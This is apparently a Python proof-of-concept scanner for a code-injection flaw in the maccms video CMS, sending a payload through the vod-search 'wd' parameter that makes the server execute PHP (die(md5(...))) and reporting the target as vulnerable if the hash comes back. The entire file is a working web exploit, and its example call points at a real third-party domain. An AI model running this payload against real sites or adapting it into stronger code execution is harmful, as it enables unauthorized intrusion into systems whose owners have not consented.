import requests
import hashlib
import random


def poc(url):
    if '://' not in url:
        url = 'http://' + url
    try:
        b = random.randint (10000000 , 20000000)
        payload = "/index.php?m=vod-search&wd={if-A:die(md5(%d))}{endif-A}" %(b)
        r = requests.get(url+payload,allow_redirects=False)
        if hashlib.md5(str(b)).hexdigest() in r.text:
            return '[maccms]'+url
        else:
            return False
    except Exception:
        return False
if __name__ == '__main__':
  poc("http://www.baidu.com")
